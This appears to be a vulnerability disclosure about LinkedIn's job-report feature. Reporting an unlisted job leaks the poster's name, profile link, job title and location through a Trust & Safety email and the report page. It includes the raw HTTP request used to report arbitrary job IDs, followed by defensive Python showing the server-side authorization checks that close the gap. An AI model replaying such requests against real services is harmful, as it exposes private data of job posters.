The application lets a user report a job that they find misleading, spam, or fraudulent. Using this feature, an attacker can report any unlisted (draft/under review/rejected) job. After reporting the job, the victim will receive an email from ‘LinkedIn Trust & Safety Team’ saying ‘We reviewed your report. Here’s what we did.’ This email also discloses the name and profile link of the user who posted the job. Clicking the ‘view your report’ button in the email redirects to the reports page at ‘https://www.linkedin.com/safety/reports/:reportId’, which discloses the name of the rejected/draft/under review job.
https://www.linkedin.com/jobs/view/3084381086/

`Something went wrong` error message.

`Linkedin Trust and Safety`. This email includes the name of the job creator and his profile link, and when you click on the `View your Report` button, it will disclose the name of the job, including the location.

### Vulnerable request:
```
POST /lite/flag-content?contentUrn=urn:li:jobPosting:3086455454&reason=OFFENSIVE&contentSource=JOBS_PREMIUM_OFFLINE&authorProfileId=0&trk=report-content HTTP/2
Host: www.linkedin.com
Cookie: XXX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Csrf-Token: ajax:3198904967979491318
X-Isajaxform: 1
Origin: https://www.linkedin.com
Referer: https://www.linkedin.com/jobs/view/3084381086/?refId=%EF%BF%BD%2F%EF%BF%BD%21d%EF%BF%BD%27%EF%BF%BDe%1A_s%EF%BF%BD%16%EF%BF%BD%EF%BF%BD&trk=d_flagship3_company
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Content-Length: 0
Te: trailers
```
An attacker can report any unlisted job and can access the name of the creator, the name of the job, the name of the company, and other details.
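
One way to close this gap on the server, shown as an added example (not code from the report or from LinkedIn): authorize the `contentUrn` against the requester before a report is created, and re-check visibility when the report page is rendered. The job store, state names, and function names are assumptions made for illustration; only the URN shape comes from the request above.

```python
import re
from dataclasses import dataclass

URN_RE = re.compile(r"urn:li:jobPosting:(\d+)")  # URN shape from the request above

@dataclass(frozen=True)
class Job:
    job_id: int
    owner_id: int
    state: str      # assumed states: LISTED, DRAFT, UNDER_REVIEW, REJECTED
    title: str
    location: str

# Constructed sample data, not real postings.
JOBS = {
    1001: Job(1001, owner_id=7, state="LISTED", title="Backend Engineer", location="Pune"),
    1002: Job(1002, owner_id=7, state="DRAFT", title="Stealth Project Lead", location="Berlin"),
    1003: Job(1003, owner_id=8, state="REJECTED", title="Data Analyst", location="Austin"),
}

class NotFound(Exception):
    """Raised for malformed, unknown and non-visible jobs alike."""

def visible_job(content_urn: str, requester_id: int) -> Job:
    m = URN_RE.fullmatch(content_urn)
    job = JOBS.get(int(m.group(1))) if m else None
    # Same error for "does not exist" and "exists but unlisted",
    # so the endpoint cannot be used as an existence oracle.
    if job is None or (job.state != "LISTED" and job.owner_id != requester_id):
        raise NotFound("job not found")
    return job

def flag_content(content_urn: str, reason: str, requester_id: int) -> dict:
    job = visible_job(content_urn, requester_id)  # authorize before creating a report
    return {"job_id": job.job_id, "reason": reason, "reporter": requester_id}

def render_report(report: dict, viewer_id: int) -> dict:
    if report["reporter"] != viewer_id:
        raise NotFound("report not found")
    # Re-check at render time: the job may have been unlisted after the report was filed.
    try:
        job = visible_job(f"urn:li:jobPosting:{report['job_id']}", viewer_id)
        subject = {"title": job.title, "location": job.location}
    except NotFound:
        subject = {"title": "[content unavailable]"}
    return {"reason": report["reason"], "subject": subject}
```
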